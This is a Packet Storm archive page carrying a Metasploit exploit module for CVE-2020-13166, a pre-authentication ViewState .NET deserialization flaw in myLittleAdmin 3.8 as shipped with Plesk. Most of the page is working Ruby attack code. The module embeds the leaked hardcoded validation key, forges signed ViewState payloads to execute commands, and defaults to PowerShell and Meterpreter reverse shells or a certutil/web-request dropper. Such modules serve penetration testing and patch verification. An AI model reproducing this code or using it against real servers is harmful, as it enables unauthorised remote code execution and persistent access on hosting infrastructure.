what you don't know can hurt you

Plesk / myLittleAdmin ViewState .NET Deserialization

Plesk / myLittleAdmin ViewState .NET Deserialization
Posted May 22, 2020
Authored by Spencer McIntyre, wvu | Site metasploit.com

This Metasploit module exploits a ViewState .NET deserialization vulnerability in web-based MS SQL Server management tool myLittleAdmin, for version 3.8 and likely older versions, due to hardcoded machineKey parameters in the web.config file for ASP.NET. Popular web hosting control panel Plesk offers myLittleAdmin as an optional component that is selected automatically during "full" installation. This exploit caters to the Plesk target, though it should work fine against a standalone myLittleAdmin setup. Successful exploitation results in code execution as the user running myLittleAdmin, which is IUSRPLESK_sqladmin for Plesk and described as the "SQL Admin MSSQL anonymous account". Tested on the latest Plesk Obsidian with optional myLittleAdmin 3.8.

tags | exploit, web, code execution, asp
advisories | CVE-2020-13166
MD5 | 863f2f71f0ddb8aeb000570885bf0d3f

Plesk / myLittleAdmin ViewState .NET Deserialization

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

# <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
VIEWSTATE_GENERATOR = 'CA0B0334'.freeze

# <machineKey
# validationKey="5C7EEF6650639D2CB8FAA0DA36AF24452DCF69065F2EDC2C8F2F44C0220BE2E5889CA01A207FC5FCE62D1A5A4F6D2410722261E6A33E77E0628B17AA928039BF"
# decryptionKey="DC47E74EA278F789D2FF0E412AD840A89C10171F408D8AC4"
# validation="SHA1" />
VIEWSTATE_VALIDATION_KEY =
"\x5c\x7e\xef\x66\x50\x63\x9d\x2c\xb8\xfa\xa0\xda\x36\xaf\x24\x45\x2d\xcf" \
"\x69\x06\x5f\x2e\xdc\x2c\x8f\x2f\x44\xc0\x22\x0b\xe2\xe5\x88\x9c\xa0\x1a" \
"\x20\x7f\xc5\xfc\xe6\x2d\x1a\x5a\x4f\x6d\x24\x10\x72\x22\x61\xe6\xa3\x3e" \
"\x77\xe0\x62\x8b\x17\xaa\x92\x80\x39\xbf".freeze

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::ViewState
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Plesk/myLittleAdmin ViewState .NET Deserialization',
'Description' => %q{
This module exploits a ViewState .NET deserialization vulnerability in
web-based MS SQL Server management tool myLittleAdmin, for version 3.8
and likely older versions, due to hardcoded <machineKey> parameters in
the web.config file for ASP.NET.

Popular web hosting control panel Plesk offers myLittleAdmin as an
optional component that is selected automatically during "full"
installation. This exploit caters to the Plesk target, though it
should work fine against a standalone myLittleAdmin setup.

Successful exploitation results in code execution as the user running
myLittleAdmin, which is IUSRPLESK_sqladmin for Plesk and described as
the "SQL Admin MSSQL anonymous account."

Tested on the latest Plesk Obsidian with optional myLittleAdmin 3.8.
},
'Author' => [
# Reported to SecuriTeam SSD by an anonymous researcher
# Reference exploit written by said anonymous researcher
# Publicly disclosed by Noam Rathaus of SecuriTeam's SSD
'Spencer McIntyre', # Inspiration
'wvu' # Module
],
'References' => [
['CVE', '2020-13166'],
['URL', 'https://ssd-disclosure.com/ssd-advisory-mylittleadmin-preauth-rce/'],
['URL', 'https://portswigger.net/daily-swig/mylittleadmin-has-a-big-unpatched-security-flaw']
],
'DisclosureDate' => '2020-05-15', # SecuriTeam SSD advisory
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' => [
[
'Windows Command',
'Arch' => ARCH_CMD,
'Type' => :win_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
}
],
[
'Windows Dropper',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :win_dropper,
'CmdStagerFlavor' => %i[psh_invokewebrequest certutil vbs],
'DefaultOptions' => {
'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
}
],
[
'PowerShell Stager',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :psh_stager,
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
}
]
],
'DefaultTarget' => 2,
'DefaultOptions' => {
'SSL' => true,
'WfsDelay' => 10 # First exploit attempt may be a little slow
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)

register_options([
Opt::RPORT(8401, true, 'The myLittleAdmin port (default for Plesk!)'),
OptString.new('TARGETURI', [true, 'Base path', '/'])
])

# XXX: https://github.com/rapid7/metasploit-framework/issues/12963
import_target_defaults
end

def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
)

unless res
return CheckCode::Unknown('Target did not respond to check request.')
end

unless res.code == 200 && res.body.include?('myLittleAdmin for SQL Server')
return CheckCode::Unknown('Target is not running myLittleAdmin.')
end

vprint_good("myLittleAdmin is running at #{full_uri}")
check_viewstate(res.get_html_document)
end

def check_viewstate(html)
viewstate = html.at('//input[@id = "__VIEWSTATE"]/@value')&.text

unless viewstate
return CheckCode::Detected("__VIEWSTATE not found, can't complete check.")
end

@viewstate_generator =
html.at('//input[@id = "__VIEWSTATEGENERATOR"]/@value')&.text

unless @viewstate_generator
print_warning('__VIEWSTATEGENERATOR not found, using known default value')
@viewstate_generator = VIEWSTATE_GENERATOR
end

# ViewState generator needs to be a packed integer now
@viewstate_generator = [@viewstate_generator.to_i(16)].pack('V')

we_can_sign_viewstate = can_sign_viewstate?(
viewstate,
extra: @viewstate_generator,
key: VIEWSTATE_VALIDATION_KEY
)

if we_can_sign_viewstate
return CheckCode::Vulnerable('We can sign our own ViewState.')
end

CheckCode::Safe("We can't sign our own ViewState.")
end

def exploit
# NOTE: Automatic check is implemented by the AutoCheck mixin
super

print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

case target['Type']
when :win_cmd
execute_command(payload.encoded)
when :win_dropper
execute_cmdstager
when :psh_stager
execute_command(cmd_psh_payload(
payload.encoded,
payload.arch.first,
remove_comspec: true
))
end
end

def execute_command(cmd, _opts = {})
vprint_status("Serializing command: #{cmd}")

res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'vars_post' => {
# This is the only parameter we need for successful exploitation!
'__VIEWSTATE' => generate_viewstate_payload(
cmd,
extra: @viewstate_generator,
key: VIEWSTATE_VALIDATION_KEY
)
}
)

unless res && res.code == 302 && res.redirection.path == '/error/index.html'
fail_with(Failure::PayloadFailed, "Could not execute command: #{cmd}")
end

print_good("Successfully executed command: #{cmd}")
end

end
Login or Register to add favorites

File Archive:

May 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    14 Files
  • 2
    May 2nd
    3 Files
  • 3
    May 3rd
    1 Files
  • 4
    May 4th
    18 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    21 Files
  • 7
    May 7th
    15 Files
  • 8
    May 8th
    19 Files
  • 9
    May 9th
    1 Files
  • 10
    May 10th
    2 Files
  • 11
    May 11th
    18 Files
  • 12
    May 12th
    39 Files
  • 13
    May 13th
    15 Files
  • 14
    May 14th
    17 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    2 Files
  • 17
    May 17th
    2 Files
  • 18
    May 18th
    15 Files
  • 19
    May 19th
    21 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    15 Files
  • 22
    May 22nd
    6 Files
  • 23
    May 23rd
    1 Files
  • 24
    May 24th
    1 Files
  • 25
    May 25th
    2 Files
  • 26
    May 26th
    23 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close